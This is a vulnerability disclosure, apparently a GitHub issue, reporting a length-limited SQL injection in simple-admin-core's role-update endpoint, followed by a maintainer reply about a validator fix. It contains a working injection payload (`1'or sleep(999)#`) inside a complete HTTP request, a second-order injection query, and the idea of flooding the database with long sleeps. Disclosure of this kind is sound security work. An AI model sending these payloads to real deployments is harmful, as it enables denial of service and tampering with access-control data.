There is a restricted SQL injection vulnerability in simple-admin-core.

[66Giraffe66]

There is a restricted SQL injection vulnerability in simple-admin-core.

• The /sys-api/role/update interface in the simple-admin-core system has a limited SQL injection vulnerability, which may lead to partial data leakage or disruption of normal system operations.

Affected versions

• v1.2.0 ~ v1.6.7

Vulnerability Analysis

• The cause of this SQL injection vulnerability lies in the fact that the code value passed to the /sys-api/role/update interface is directly inserted into the SQL statement operating on the casbin_rules table. However, since the system restricts the length of code to no more than 20 characters, the potential harm is very limited.

• But theoretically, if the contents of the casbin_rules table can be queried through an interface, shorter statements could be constructed to update a field in the table to the data intended to be leaked. However, I haven't found an interface that can display the data in this table.
• In theory, a user could first be created with their code set to the latter half of an SQL statement, and then a secondary injection could be caused during the update, allowing the construction of a payload with a length of 20*2=40 characters, similar to the following:

update casbin_rules set v0='',v0=(select/*) WHERE v0='*/database()#'  

• Additionally, there is the possibility of a MySQL DDoS attack, where multiple packets with excessively long sleep times are sent to occupy the database thread pool, thereby affecting normal operations.
• Finally, the content of the update could be controlled to arbitrarily modify the data in the table, thereby impacting normal operations.

• Complete packet

POST /sys-api/role/update HTTP/1.1
Host: 192.168.236.54
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0SWQiOjEsImV4cCI6MTc0Nzk5NTI4NSwiaWF0IjoxNzQ3NzM2MDg1LCJyb2xlSWQiOiIwMDEiLCJ1c2VySWQiOiIwMTk2ZWM2Mi1kNDkyLTcxZTYtOTAzZS1lYzk5ODAyMzZjMTEifQ.ya-pcDJ3_MrxadP_y7vLwxGb2l4tb7ITrC7Uh65Pjf8
Content-Length: 105
Origin: http://192.168.236.54
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://192.168.236.54/
Priority: u=0

{"sort":55,"status":1,"id":4,"name":"right","code":"1'or sleep(999)#","defaultRouter":"test","remark":""}

[suyuan32]

Yes, I had optimize validator to avoid this injection. f1e2c4f
If you have a better solution, welcome to submit a PR.